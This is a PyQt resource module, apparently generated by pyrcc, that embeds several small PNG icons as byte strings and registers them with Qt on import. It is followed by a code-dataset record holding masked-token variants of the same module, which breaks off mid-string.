\x07\x74\x49\x4d\x45\x07\xe4\x09\x19\x08\x30\x1e\x4a\x5a\xd3\x78\
\x00\x00\x01\x8a\x49\x44\x41\x54\x28\xcf\x63\x60\x80\x02\x46\x11\
\x51\x31\x71\x09\x49\x26\x06\x24\xc0\x08\x06\x52\xd2\x32\xb2\x72\
\xf2\xcc\x4c\x4c\x4c\x2c\xac\x70\x71\x05\x45\x46\x46\x25\xe5\x65\
\xcb\x57\xa8\x30\x33\xa9\xaa\x31\xb3\xb1\x42\xc5\xd5\x35\x34\xb5\
\x18\xb5\x75\x80\x12\xba\x7a\xfa\xba\x06\x86\xcc\xec\xac\x60\x09\
\x75\xa3\x95\x2b\x8d\x4d\x4c\x57\x02\x25\xcc\xcc\x2d\x56\xac\xb0\
\x34\x64\xe6\x00\x49\x58\x59\xaf\x84\x00\xa0\x04\x04\xd8\xd8\x72\
\x82\x24\xec\xec\xd1\x25\x1c\x1c\x99\xc0\x46\x29\x3a\x41\x24\x9c\
\x5d\x20\xe2\xae\x6e\xcc\xcc\x10\xb7\xba\x83\x84\x3d\x3c\xbd\xbc\
\x7d\x5c\x41\x12\xbe\x7e\xcc\x9c\x4c\x0c\xfe\x01\x81\x41\xc1\x20\
\xf1\x10\x46\x2e\x6e\x8e\xd0\x30\xa0\x44\x78\x44\x64\x54\x34\x83\
\x68\x0c\xc4\x1c\x4f\xa0\x4e\x56\x1e\x8e\x58\xb0\x61\x71\xf1\x09\
\x0c\x8a\x89\x60\xf1\xa4\x10\x46\x46\x06\x06\x56\xa6\xe4\x14\xb0\
\x4c\x6a\x1a\x83\x62\x3a\x44\x22\x03\x24\xc1\xcb\x94\x99\x05\x96\
\xc8\x4e\x63\x10\xcd\xc9\x05\xcb\xe4\x01\x8d\xe2\xe5\x63\xce\x2f\
\x00\x4b\xc8\x49\x30\x14\x16\x15\xe7\x95\x00\x25\x4a\xcb\x80\x96\
\xf3\x97\x57\x00\x45\x2b\xab\x22\xaa\x25\xc1\xce\xad\x01\x69\xa9\
\xad\xab\x6f\xc8\x07\x89\xaf\x68\x6c\x62\x86\x78\xa4\x19\x62\x8d\
\x4e\x4b\x2b\xc4\x9c\xb6\x76\x26\xb0\xcf\xad\x3a\xd0\x83\xa4\xb3\
\x0b\x2c\xd1\xdd\x83\x2e\xd1\x0b\x0d\xab\xbe\xfe\x95\x2b\x27\x4c\
\x9c\x04\x92\xc8\x9a\x3c\x05\xe8\x24\x37\x66\x01\x48\x44\x49\x4d\
\x9d\xd6\x3d\x7d\x06\x48\x62\xe6\xac\xd9\x73\xe6\xba\x31\x0b\x0a\
\x41\xa3\x70\xde\x7c\x46\xc6\x40\xa0\x44\xc1\x02\x66\xe6\x85\x8b\
\x98\x05\x79\x90\x13\x43\xc0\x62\x19\x59\xcb\x4c\x66\x60\x6a\x10\
\xe6\x41\x49\x2a\xfe\x8a\x62\x4b\x12\x96\x32\xc3\xf8\x00\x2f\x5c\
\xba\x88\xe8\x0b\x3a\x2c\x00\x00\x00\x25\x74\x45\x58\x74\x64\x61\
\x74\x65\x3a\x63\x72\x65\x61\x74\x65\x00\x32\x30\x32\x30\x2d\x30\
\x37\x2d\x31\x39\x54\x30\x33\x3a\x33\x39\x3a\x31\x38\x2b\x30\x30\
\x3a\x30\x30\x3b\x07\x47\xd8\x00\x00\x00\x25\x74\x45\x58\x74\x64\
\x61\x74\x65\x3a\x6d\x6f\x64\x69\x66\x79\x00\x32\x30\x32\x30\x2d\
\x30\x35\x2d\x30\x32\x54\x30\x31\x3a\x32\x38\x3a\x35\x35\x2b\x30\
\x30\x3a\x30\x30\x48\x1e\x77\xe4\x00\x00\x00\x20\x74\x45\x58\x74\
\x73\x6f\x66\x74\x77\x61\x72\x65\x00\x68\x74\x74\x70\x73\x3a\x2f\
\x2f\x69\x6d\x61\x67\x65\x6d\x61\x67\x69\x63\x6b\x2e\x6f\x72\x67\
\xbc\xcf\x1d\x9d\x00\x00\x00\x63\x74\x45\x58\x74\x73\x76\x67\x3a\
\x63\x6f\x6d\x6d\x65\x6e\x74\x00\x20\x47\x65\x6e\x65\x72\x61\x74\
\x6f\x72\x3a\x20\x41\x64\x6f\x62\x65\x20\x49\x6c\x6c\x75\x73\x74\
\x72\x61\x74\x6f\x72\x20\x31\x39\x2e\x30\x2e\x30\x2c\x20\x53\x56\
\x47\x20\x45\x78\x70\x6f\x72\x74\x20\x50\x6c\x75\x67\x2d\x49\x6e\
\x20\x2e\x20\x53\x56\x47\x20\x56\x65\x72\x73\x69\x6f\x6e\x3a\x20\
\x36\x2e\x30\x30\x20\x42\x75\x69\x6c\x64\x20\x30\x29\x20\x20\xce\
\x48\x90\x0b\x00\x00\x00\x18\x74\x45\x58\x74\x54\x68\x75\x6d\x62\
\x3a\x3a\x44\x6f\x63\x75\x6d\x65\x6e\x74\x3a\x3a\x50\x61\x67\x65\
\x73\x00\x31\xa7\xff\xbb\x2f\x00\x00\x00\x18\x74\x45\x58\x74\x54\
\x68\x75\x6d\x62\x3a\x3a\x49\x6d\x61\x67\x65\x3a\x3a\x48\x65\x69\
\x67\x68\x74\x00\x35\x38\x37\x2e\x25\x1c\x47\x00\x00\x00\x17\x74\
\x45\x58\x74\x54\x68\x75\x6d\x62\x3a\x3a\x49\x6d\x61\x67\x65\x3a\
\x3a\x57\x69\x64\x74\x68\x00\x35\x38\x37\xbd\xd4\x4c\x1a\x00\x00\
\x00\x19\x74\x45\x58\x74\x54\x68\x75\x6d\x62\x3a\x3a\x4d\x69\x6d\
\x65\x74\x79\x70\x65\x00\x69\x6d\x61\x67\x65\x2f\x70\x6e\x67\x3f\
\xb2\x56\x4e\x00\x00\x00\x17\x74\x45\x58\x74\x54\x68\x75\x6d\x62\
\x3a\x3a\x4d\x54\x69\x6d\x65\x00\x31\x35\x38\x38\x33\x38\x32\x39\
\x33\x35\x93\xf3\x7b\x53\x00\x00\x00\x12\x74\x45\x58\x74\x54\x68\
\x75\x6d\x62\x3a\x3a\x53\x69\x7a\x65\x00\x33\x32\x37\x36\x32\x42\
\x50\x47\x06\xdb\x00\x00\x00\x5a\x74\x45\x58\x74\x54\x68\x75\x6d\
\x62\x3a\x3a\x55\x52\x49\x00\x66\x69\x6c\x65\x3a\x2f\x2f\x2f\x64\
\x61\x74\x61\x2f\x77\x77\x77\x72\x6f\x6f\x74\x2f\x77\x77\x77\x2e\
\x65\x61\x73\x79\x69\x63\x6f\x6e\x2e\x6e\x65\x74\x2f\x63\x64\x6e\
\x2d\x69\x6d\x67\x2e\x65\x61\x73\x79\x69\x63\x6f\x6e\x2e\x63\x6e\
\x2f\x66\x69\x6c\x65\x73\x2f\x31\x32\x35\x2f\x31\x32\x35\x37\x33\
\x32\x38\x2e\x70\x6e\x67\xf9\x67\xb6\x19\x00\x00\x00\x00\x49\x45\
\x4e\x44\xae\x42\x60\x82\
\x00\x00\x07\xd2\
\x89\
\x50\x4e\x47\x0d\x0a\x1a\x0a\x00\x00\x00\x0d\x49\x48\x44\x52\x00\
\x00\x00\x18\x00\x00\x00\x18\x08\x06\x00\x00\x00\xe0\x77\x3d\xf8\
\x00\x00\x00\x04\x67\x41\x4d\x41\x00\x00\xb1\x8f\x0b\xfc\x61\x05\
\x00\x00\x00\x20\x63\x48\x52\x4d\x00\x00\x7a\x26\x00\x00\x80\x84\
\x00\x00\xfa\x00\x00\x00\x80\xe8\x00\x00\x75\x30\x00\x00\xea\x60\
\x00\x00\x3a\x98\x00\x00\x17\x70\x9c\xba\x51\x3c\x00\x00\x00\x06\
\x62\x4b\x47\x44\x00\xff\x00\xff\x00\xff\xa0\xbd\xa7\x93\x00\x00\
\x00\x09\x70\x48\x59\x73\x00\x00\x0d\xd7\x00\x00\x0d\xd7\x01\x42\
\x28\x9b\x78\x00\x00\x00\x07\x74\x49\x4d\x45\x07\xe4\x09\x19\x08\
\x30\x34\x91\xe1\x1a\xae\x00\x00\x05\x5d\x49\x44\x41\x54\x48\xc7\
\xdd\x95\x4d\x88\x9d\x57\x19\xc7\x7f\xef\xf7\x7d\xe7\xde\xb9\x33\
\x99\xef\xc9\x24\x4d\x1a\xd3\x4e\x1d\x9b\x59\x44\x0c\xba\xb0\x68\
\xa0\x76\x15\x37\x8a\xb8\x30\x45\x44\x10\xf1\x03\x5c\x99\x4d\x11\
\x04\x17\x82\x0b\x91\x5a\xe8\xca\x8d\x90\xd2\x9d\x8a\x22\xb8\xb2\
\xa2\x42\x5b\xd2\x26\xd1\x26\x69\x12\x93\x4c\xe6\xde\x99\xb9\x33\
\x73\xe7\x7e\xbf\xf7\x7d\xcf\x39\xcf\xe3\xe2\xde\x49\x8d\x58\x71\
\xed\x03\x7f\xce\xe1\x2c\xce\xef\xf9\x3f\xcf\x73\x38\x1e\x1f\x12\
\x2f\x7f\xeb\x02\xf1\xec\x71\x6c\xb7\x49\x69\x66\x99\x22\x9c\x60\
\xd0\xef\x91\xed\xd7\xf1\x87\x1d\xde\x7a\xd0\xe2\xfc\x33\x0b\x7c\
\xfb\x95\xdf\xf0\xdf\x22\xf8\x4f\x87\x3f\xff\xee\x17\x90\xce\x0e\
\xd3\xab\x9f\x64\x3e\x36\x95\x81\x84\x9f\xe8\x75\xbb\xe7\x8b\xac\
\x77\xd6\x13\x37\x9d\x52\xb4\xfb\x1a\x0f\xe7\x13\xcb\xf9\xb3\x4f\
\xf3\x87\x2b\x77\x3e\x14\xe0\xbd\x72\xf9\x75\xa6\xaa\x55\x96\x66\
\x67\xa9\xa4\x29\xbe\xef\xd3\xdb\xba\xcf\x9d\x95\x17\x28\xfd\xee\
\xa5\xcf\xde\xdf\x6e\x5e\xda\xdd\x6f\x7e\x5c\x55\x13\x0f\x3c\x67\
\x8d\xf1\xd5\xfd\x2d\x25\xff\xc9\x8f\xcf\xd5\x7f\xfd\xdb\x13\x3f\
\xd0\x78\xf6\x18\x59\x96\xd1\xed\x76\xd9\xdf\x6f\xb2\x59\xab\x71\
\xfb\xf6\x1d\xb6\xb7\xea\x84\x9e\xe7\x79\x61\x10\x44\x49\x14\xf9\
\xe5\x34\xf5\xe3\x28\xf2\x67\xd6\xce\xb2\xf9\xfa\x0f\x9f\xbf\x7e\
\xb7\xf6\xf2\x20\xcf\xcb\x9f\x3a\xff\xc2\x70\xe5\xe4\xe9\xe0\xc1\
\x83\x87\xfe\xb5\x2b\x6f\xe9\xee\x83\xdb\x67\x3b\xd6\xfd\xe2\x7b\
\x7f\x5d\xbe\xf4\x95\xf3\x6b\xbf\xea\x0d\x32\xf2\x3c\x17\x40\x44\
\x45\x44\x44\x55\xd5\x01\x7d\xef\xa7\xbf\x7c\xed\xa4\xc0\x8f\x82\
\x20\x58\x4c\xe3\x24\xf4\x7d\x2f\xf2\x86\xfd\x70\xf3\xca\x9f\x4f\
\x1d\x74\xbb\x73\x5f\xfc\xea\x37\xf3\xd5\xd5\xd5\xa4\xdd\xe9\xf2\
\xc6\x9f\xfe\xc2\xb5\xbf\xdf\xa0\xdb\x69\xd9\x41\xed\x56\xe8\x99\
\xac\x37\xf5\xc4\x47\xeb\x2d\xe3\xbb\x7c\x98\x4b\x5e\xe4\xae\xc8\
\x73\xc9\xf3\x42\xf2\x3c\xaf\x5b\x53\x7c\x27\x0c\xc3\x60\x32\x2b\
\xcc\xf3\x85\xb1\xf3\x59\x36\xc4\x39\xc1\x6f\x6f\x53\xaf\xd7\xf8\
\xf4\xe7\xbf\xc4\xfa\xb3\xcf\x26\x9e\x07\x6d\x55\xaa\xd5\x0a\x73\
\x33\x47\xf0\x83\x20\xcc\xba\x4b\xf4\x36\xde\xab\xec\xdf\xb8\xfe\
\x74\x93\x49\x54\x05\x54\x51\x55\x00\x54\x75\x09\x95\x52\x98\x26\
\x09\xb9\x71\xd6\x88\xc5\x59\x87\x88\x45\x5a\x7b\x04\x49\xca\xd2\
\xb1\x13\x74\x7a\x7d\xac\xb3\x38\x11\xd2\x52\x89\xea\x64\x85\xbc\
\x28\x28\x4d\x4e\xd3\xf1\x23\xc8\x33\x82\xb8\x8c\x11\x1d\x03\xe4\
\x10\xe0\x50\x25\x34\x85\x51\x15\xc1\x5a\x8b\x38\x41\xac\xc5\x64\
\x19\x7e\x10\xb2\x77\xd0\xe6\xee\xc6\x43\x92\x28\x22\x0a\x03\xc4\
\x39\xc2\x30\xc0\xf7\x3d\x02\xdf\xc7\x29\x38\x6b\x20\x12\x54\x14\
\x18\x03\x14\x14\x05\x15\xc2\x41\x96\x21\xa2\xe3\xec\x05\x67\x1d\
\x8a\x47\x31\x1c\xb0\xf1\x70\x93\x61\x5e\x50\x99\x48\x99\x48\x12\
\x0e\x5a\x6d\xb2\x6c\x88\x29\x0a\xac\x29\x28\x86\x7d\xc0\xc3\x89\
\xa0\x87\xe5\x51\x41\x47\x16\x46\x80\x7e\x96\x11\x04\x11\xce\x5a\
\x54\x15\xe3\x04\xa2\x14\xc9\x07\x34\x36\xee\x12\x97\x26\x28\x8a\
\x82\x2c\x8e\x69\xec\xed\xd1\x6a\xb5\xc9\x86\x39\xed\xdd\x3a\xc3\
\x5e\x87\x64\x6a\x0e\x6b\x05\xe5\x10\x70\xd8\x87\xd1\x3e\xcc\xb2\
\x21\x49\x02\xce\x39\x54\x15\x67\x2d\x52\xaa\x12\xa5\x65\x1a\xb7\
\xae\x82\x1f\x32\xbb\x72\x82\x34\x49\x68\xec\xee\x8d\x66\x7d\x7b\
\x93\xbd\x7b\x37\x48\xfc\x90\x5c\x13\xac\x38\xfc\x51\xdd\xc7\xa5\
\xf9\x17\x40\x51\x18\x3c\x3f\xc0\x5a\x87\x8a\xe0\xac\xc5\x12\x12\
\x2e\x9c\x84\xee\x75\xee\xbf\xfd\x47\x76\xee\x2d\x92\x56\x67\x69\
\xee\x36\xe8\x36\x1b\xf4\x9b\x3b\x94\xf1\xf8\xcc\x62\x99\x5b\x7d\
\xc3\xbd\xb0\x4a\xd3\xf4\x1f\xcb\x5e\x55\xf1\x50\x42\x63\x0c\x41\
\x10\x8c\x32\x17\xc5\x5a\x87\x73\x0e\x1b\x4d\x52\x39\x75\x06\x7d\
\x78\x9b\xf6\xd6\x06\x3b\xff\xb8\x89\x35\x16\x51\x21\x2a\x4d\x50\
\x89\x27\xa8\x86\xc2\x7a\xf5\x34\x13\xfd\x9c\x1b\x31\x34\xb2\xce\
\xa3\xcc\x0f\xfb\x10\x5a\x6b\xb1\xc6\x62\x9d\x43\x9c\xe0\xdc\x08\
\x20\xce\x61\xfd\x94\xe0\xe8\x33\x1c\x99\x3d\x8e\x1b\xf6\x11\x51\
\x0e\x0e\x0e\xd8\xda\xd9\xe5\xc0\x78\x4c\xf5\x16\x58\x4d\x53\x3e\
\x32\x59\x46\xdb\x82\xc4\x8e\xc6\x70\x0c\x19\x0d\x2b\xa1\x73\x0e\
\xeb\x1c\xce\x5a\x9c\x93\xb1\x93\xf1\x34\xe9\xc8\x91\x25\x42\xa2\
\x2a\x22\xc2\xc0\xb5\x31\xd6\x81\x07\xef\x99\x26\xa1\xe7\xf3\x84\
\x5f\xe6\x58\x5c\x41\x73\x41\x4b\x4a\x23\x6b\x8f\x5d\x28\xa1\xb3\
\x0e\x17\xd8\x0f\xc6\xd4\x09\x22\x0e\xeb\xec\xbf\x39\x92\x31\xd8\
\xa2\x2a\x78\x78\xb4\xf3\x1e\xef\x8a\x83\x64\x91\xa3\x12\xb3\xa0\
\x09\x4a\x15\x2d\x09\x8d\xac\xed\x21\x82\x2f\xce\x79\x6e\x24\x8c\
\xb1\x38\x67\xc7\xcd\x1e\xbb\xb2\x6e\x24\x37\x5a\xc5\xb9\x0f\x5e\
\xac\x42\x3b\xef\xf3\xce\x70\x8b\xba\x5f\x20\x4e\x38\x52\xf8\xac\
\x6a\x95\xc9\x30\xd1\xcc\xe4\x9e\x6f\x8a\xc2\x16\x79\xd1\x36\x85\
\x79\xfc\x42\xeb\x46\x0d\xb7\xf6\xd1\xe5\xce\x8d\x5c\x1e\x3e\x2a\
\x55\xc1\xf3\xa0\x3d\xec\xf1\xce\x70\x8b\x9d\xd8\xe1\xfb\xb0\x5a\
\xda\xeb\x2d\x98\x9d\x57\x37\xb6\x5b\xb5\x70\x6f\xab\x76\x57\x94\
\x17\x81\x73\x61\x14\xaf\x07\x61\xb4\xe6\x07\xe1\x49\x55\xe6\x14\
\x12\x15\x79\x54\xba\xc3\xbd\xa2\x78\x80\xaa\xa0\x82\x35\x45\xde\
\xa8\x75\xda\x37\x8b\xb8\x7b\xed\x73\x4b\xcb\xd1\xf2\x74\xfd\xed\
\xa7\x1a\xf7\x2e\xbf\x76\xf1\xb9\x3c\x4c\xcb\xe5\x62\x7e\xf9\xd8\
\x9b\x5f\xfb\xfe\x4b\x6f\x9e\x9b\xf2\xc2\x99\xf9\xc5\xe9\x85\x95\
\xe3\x2b\xe5\xc9\xa9\xd5\xb8\x94\x9e\x89\xe2\xe4\x4c\x10\x44\x4f\
\xf9\x41\xb0\xec\xfb\x41\x55\x55\x02\x67\x6d\x6e\x4d\xb1\x93\xf5\
\xfb\xef\x0f\x07\xfd\x77\x07\xbd\xee\xd5\x22\xcf\x6f\xd5\x61\xf3\
\xea\xfb\x57\x9b\xaa\x97\xf3\x9b\xcf\x7d\x9d\x2f\xff\xec\x0d\xbc\
\xc7\xbe\x37\xcf\x63\x61\xe5\x38\xa7\xd7\xd6\xb9\x70\xf1\x1b\x5c\
\xba\x78\xc1\x07\x2a\x33\xf3\x4b\x0b\xd5\x23\xb3\xa7\xca\xd5\xa9\
\xb5\x3c\xeb\x2f\xed\xed\xd4\x6a\xfd\x76\xe7\xbe\x31\x45\x03\x68\
\x01\x9d\xb1\xb2\xf5\xa3\x73\xd2\xec\xb5\xd8\xec\x58\xfe\xa7\x08\
\xa3\x88\x27\x57\x3f\xc6\xab\xbf\xbf\x02\xe0\x03\xd1\x58\xf1\x58\
\xe1\xf8\xfc\xff\x34\xfe\x09\x50\xc9\xce\x14\x61\x6a\x10\x46\x00\
\x00\x00\x25\x74\x45\x58\x74\x64\x61\x74\x65\x3a\x63\x72\x65\x61\
\x74\x65\x00\x32\x30\x32\x30\x2d\x30\x37\x2d\x31\x39\x54\x30\x33\
\x3a\x33\x39\x3a\x31\x39\x2b\x30\x30\x3a\x30\x30\x9d\x70\x4c\x6c\
\x00\x00\x00\x25\x74\x45\x58\x74\x64\x61\x74\x65\x3a\x6d\x6f\x64\
\x69\x66\x79\x00\x32\x30\x31\x39\x2d\x30\x31\x2d\x30\x38\x54\x31\
\x37\x3a\x35\x34\x3a\x30\x36\x2b\x30\x30\x3a\x30\x30\xfa\xae\x64\
\x88\x00\x00\x00\x20\x74\x45\x58\x74\x73\x6f\x66\x74\x77\x61\x72\
\x65\x00\x68\x74\x74\x70\x73\x3a\x2f\x2f\x69\x6d\x61\x67\x65\x6d\
\x61\x67\x69\x63\x6b\x2e\x6f\x72\x67\xbc\xcf\x1d\x9d\x00\x00\x00\
\x18\x74\x45\x58\x74\x54\x68\x75\x6d\x62\x3a\x3a\x44\x6f\x63\x75\
\x6d\x65\x6e\x74\x3a\x3a\x50\x61\x67\x65\x73\x00\x31\xa7\xff\xbb\
\x2f\x00\x00\x00\x18\x74\x45\x58\x74\x54\x68\x75\x6d\x62\x3a\x3a\
\x49\x6d\x61\x67\x65\x3a\x3a\x48\x65\x69\x67\x68\x74\x00\x35\x31\
\x32\x8f\x8d\x53\x81\x00\x00\x00\x17\x74\x45\x58\x74\x54\x68\x75\
\x6d\x62\x3a\x3a\x49\x6d\x61\x67\x65\x3a\x3a\x57\x69\x64\x74\x68\
\x00\x35\x31\x32\x1c\x7c\x03\xdc\x00\x00\x00\x19\x74\x45\x58\x74\
\x54\x68\x75\x6d\x62\x3a\x3a\x4d\x69\x6d\x65\x74\x79\x70\x65\x00\
\x69\x6d\x61\x67\x65\x2f\x70\x6e\x67\x3f\xb2\x56\x4e\x00\x00\x00\
\x17\x74\x45\x58\x74\x54\x68\x75\x6d\x62\x3a\x3a\x4d\x54\x69\x6d\
\x65\x00\x31\x35\x34\x36\x39\x37\x30\x30\x34\x36\xc4\x38\x95\x8f\
\x00\x00\x00\x13\x74\x45\x58\x74\x54\x68\x75\x6d\x62\x3a\x3a\x53\
\x69\x7a\x65\x00\x31\x35\x32\x30\x39\x38\x42\xe5\x15\x0c\xcb\x00\
\x00\x00\x5a\x74\x45\x58\x74\x54\x68\x75\x6d\x62\x3a\x3a\x55\x52\
\x49\x00\x66\x69\x6c\x65\x3a\x2f\x2f\x2f\x64\x61\x74\x61\x2f\x77\
\x77\x77\x72\x6f\x6f\x74\x2f\x77\x77\x77\x2e\x65\x61\x73\x79\x69\
\x63\x6f\x6e\x2e\x6e\x65\x74\x2f\x63\x64\x6e\x2d\x69\x6d\x67\x2e\
\x65\x61\x73\x79\x69\x63\x6f\x6e\x2e\x63\x6e\x2f\x66\x69\x6c\x65\
\x73\x2f\x31\x30\x36\x2f\x31\x30\x36\x36\x32\x33\x38\x2e\x70\x6e\
\x67\x39\x3a\x2a\x0d\x00\x00\x00\x00\x49\x45\x4e\x44\xae\x42\x60\
\x82\
"
qt_resource_name = b"\
\x00\x03\
\x00\x00\x77\x47\
\x00\x70\
\x00\x6e\x00\x67\
\x00\x04\
\x00\x06\xfa\x5e\
\x00\x69\
\x00\x63\x00\x6f\x00\x6e\
\x00\x0b\
\x05\xff\xda\x07\
\x00\x31\
\x00\x31\x00\x33\x00\x37\x00\x32\x00\x36\x00\x34\x00\x2e\x00\x70\x00\x6e\x00\x67\
\x00\x0e\
\x02\xd3\xb9\x87\
\x00\x64\
\x00\x65\x00\x61\x00\x6c\x00\x20\x00\x73\x00\x6d\x00\x61\x00\x6c\x00\x6c\x00\x2e\x00\x70\x00\x6e\x00\x67\
\x00\x07\
\x09\xc7\x57\xa7\
\x00\x73\
\x00\x65\x00\x74\x00\x2e\x00\x70\x00\x6e\x00\x67\
\x00\x0b\
\x0f\x29\x4e\xc7\
\x00\x70\
\x00\x72\x00\x65\x00\x76\x00\x69\x00\x65\x00\x77\x00\x2e\x00\x70\x00\x6e\x00\x67\
"
qt_resource_struct_v1 = b"\
\x00\x00\x00\x00\x00\x02\x00\x00\x00\x01\x00\x00\x00\x01\
\x00\x00\x00\x00\x00\x02\x00\x00\x00\x01\x00\x00\x00\x02\
\x00\x00\x00\x0c\x00\x02\x00\x00\x00\x04\x00\x00\x00\x03\
\x00\x00\x00\x36\x00\x00\x00\x00\x00\x01\x00\x00\x01\xe2\
\x00\x00\x00\x1a\x00\x00\x00\x00\x00\x01\x00\x00\x00\x00\
\x00\x00\x00\x58\x00\x00\x00\x00\x00\x01\x00\x00\x05\x91\
\x00\x00\x00\x6c\x00\x00\x00\x00\x00\x01\x00\x00\x0c\xbc\
"
qt_resource_struct_v2 = b"\
\x00\x00\x00\x00\x00\x02\x00\x00\x00\x01\x00\x00\x00\x01\
\x00\x00\x00\x00\x00\x00\x00\x00\
\x00\x00\x00\x00\x00\x02\x00\x00\x00\x01\x00\x00\x00\x02\
\x00\x00\x00\x00\x00\x00\x00\x00\
\x00\x00\x00\x0c\x00\x02\x00\x00\x00\x04\x00\x00\x00\x03\
\x00\x00\x00\x00\x00\x00\x00\x00\
\x00\x00\x00\x36\x00\x00\x00\x00\x00\x01\x00\x00\x01\xe2\
\x00\x00\x01\x74\x56\xe3\x3f\xc3\
\x00\x00\x00\x1a\x00\x00\x00\x00\x00\x01\x00\x00\x00\x00\
\x00\x00\x01\x68\x2e\xd5\xff\x38\
\x00\x00\x00\x58\x00\x00\x00\x00\x00\x01\x00\x00\x05\x91\
\x00\x00\x01\x74\xc4\x73\x3a\x8f\
\x00\x00\x00\x6c\x00\x00\x00\x00\x00\x01\x00\x00\x0c\xbc\
\x00\x00\x01\x74\xc4\x73\xad\x43\
"
qt_version = [int(v) for v in QtCore.qVersion().split('.')]
if qt_version < [5, 8, 0]:
rcc_version = 1
qt_resource_struct = qt_resource_struct_v1
else:
rcc_version = 2
qt_resource_struct = qt_resource_struct_v2
def qInitResources():
QtCore.qRegisterResourceData(rcc_version, qt_resource_struct, qt_resource_name, qt_resource_data)
def qCleanupResources():
    """Remove the embedded resource tree from Qt's resource system."""
    QtCore.qUnregisterResourceData(
        rcc_version, qt_resource_struct, qt_resource_name, qt_resource_data
    )
# Register the resources as a side effect of importing this module.
qInitResources()
|
normal
|
{
"blob_id": "dbf831540d11a994d5483dc97c7eab474f91f0d3",
"index": 8118,
"step-1": "<mask token>\n\n\ndef qInitResources():\n QtCore.qRegisterResourceData(rcc_version, qt_resource_struct,\n qt_resource_name, qt_resource_data)\n\n\ndef qCleanupResources():\n QtCore.qUnregisterResourceData(rcc_version, qt_resource_struct,\n qt_resource_name, qt_resource_data)\n\n\n<mask token>\n",
"step-2": "<mask token>\nif qt_version < [5, 8, 0]:\n rcc_version = 1\n qt_resource_struct = qt_resource_struct_v1\nelse:\n rcc_version = 2\n qt_resource_struct = qt_resource_struct_v2\n\n\ndef qInitResources():\n QtCore.qRegisterResourceData(rcc_version, qt_resource_struct,\n qt_resource_name, qt_resource_data)\n\n\ndef qCleanupResources():\n QtCore.qUnregisterResourceData(rcc_version, qt_resource_struct,\n qt_resource_name, qt_resource_data)\n\n\nqInitResources()\n",
"step-3": "<mask token>\nqt_resource_data = (\n b'\\x00\\x00\\x01\\xde\\x89PNG\\r\\n\\x1a\\n\\x00\\x00\\x00\\rIHDR\\x00\\x00\\x00(\\x00\\x00\\x00(\\x08\\x06\\x00\\x00\\x00\\x8c\\xfe\\xb8m\\x00\\x00\\x01\\xa5IDATx\\x9c\\xed\\xd8?k\\x14A\\x1c\\x87\\xf1OB,\\x8dE\\x88X\\x0b\"$ \\xa4\\xb0I\\xa3(\\x8a\\x08\\xfei$M\\xf0\\xcc\\xebJaR\\xa8/\\xc1\\xca\" 6\\x82XYX\\x08*h\\xa2D\\xc54\\x81\\xa8\\x9bb8\\x18\\xe6vo/\\x97\\x9d5\\x1c\\xfb\\xc0\\xc0\\xdd\\xcc\\xee\\xcd\\xb3\\xbf\\xd9\\xfd\\xde\\xdc\\xd1\\xd1q2\\xb8\\x8f\\xef(\\x8e\\xd8\\xbe\\xe2V\\x1b\\x82\\xdb\\xb8<\\xc6y7\\xf0\\xbea\\x97R\\x8a1\\xcf;\\x83_M\\x8a\\xa4L\\xe7\\xfc\\xf0&\\x98x\\xc1}\\xfcs\\xf4\\x87+n\\xdfp\\xb7n\\xa2q\\xef\\xc1&X\\xc6\\xa7\\xba\\x83\\xfe\\xa7\\xe0\\xd0\\xf9\\'\\xfe\\x1e\\xcc\\xceD\\x08\\xae\\na|\\x9c\\'\\xb5\\xae\\x89^\\x1f`=\\x95\\xa8\\xbaIg\\xf1\\x03\\x0b#\\\\HS\\x9c\\xc3\\xef\\xfe\\x9b\\xba\\n\\xae\\xe0\\x05\\xde\\xe54J\\xb8\\x87\\xe7igU\\x05_\\xe2NV\\x9dA^\\xe1v\\xdaY&xA\\xd8N\\xcd\\xe46\\x8a\\xb8\\x88/\\xf1\\x9c\\xc3\\x96\\xf8!\\x9e\\xe2Of\\xa9\\x98\\x1e\\x9e\\x94\\xcd\\x99Vp\\x1a\\x1fq\\xa9\\x05\\xa9x\\xce\\xcfX,\\x1bL\\x05\\xaf\\xe1Mn\\xa3\\x84\\x9bx\\x9dvV-\\xf1\\x1a\\x1eg\\xd5\\x19\\xa4\\x87\\x8d\\xaa\\xc1\\xb8\\x82\\xa7\\x85\\xec\\x9b\\xcf,\\x143\\x8b\\x9f\\x98K\\x07\\xca*\\xf8\\x00[\\xc2\\x8f\\xa8\\xb6\\xe8\\xe7\\xedn\\xd5\\x01q\\x05\\xb7\\x84\\xb0l\\x93\\xda\\xbc\\xed\\x0b\\x9e\\xc7\\x0eN\\xe56\\x8a\\x18\\x9a\\xb7\\xe9\\x12\\xf7\\xf0L\\xf8\\xc2n\\x8b\\x91\\xf2\\xb6\\xc0\\x14>`\\xa9\\x05\\xa9>#\\xe7m\\x81\\xabx\\x9bY(\\xe5\\xba\\x9a\\xbc\\x8d\\x97\\xb8\\x87\\xcd\\xac:\\x83<2b\\xde\\x16B\\xf6\\x9d\\xcdi\\x131%\\xfc\\xa7\\xb3\\xa3$\\xfb\\xca\\xd8\\x93w\\xc7\\x9c\\xb6\\xbf\\xc2\\x1e\\xf3\\xca1/\\xb4\\xa3\\xa3\\xe3\\xc4s\\x08(\\x98\\x98$\\xc8\\xdd\\xa5@\\x00\\x00\\x00\\x00IEND\\xaeB`\\x82\\x00\\x00\\x03\\xab\\x89PNG\\r\\n\\x1a\\n\\x00\\x00\\x00\\rIHDR\\x00\\x00\\x00\\x10\\x00\\x00\\x00\\x10\\x08\\x03\\x00\\x00\\x00(-\\x0fS\\x00\\x00\\x00\\x04gAMA\\x00\\x00\\xb1\\x8f\\x0b\\xfca\\x05\\x00\\x00\\x0
0 cHRM\\x00\\x00z&\\x00\\x00\\x80\\x84\\x00\\x00\\xfa\\x00\\x00\\x00\\x80\\xe8\\x00\\x00u0\\x00\\x00\\xea`\\x00\\x00:\\x98\\x00\\x00\\x17p\\x9c\\xbaQ<\\x00\\x00\\x00\\x84PLTE279\\x00\\x00\\x00279279279279279279279279279279279279279279279279279279279279279279279279279279279279279279279279279279279279279279279279279\\xff\\xff\\xff\\xeb}\\xd90\\x00\\x00\\x00*tRNS\\x00\\x00,\\xcf\\xb7\\x01\\x18 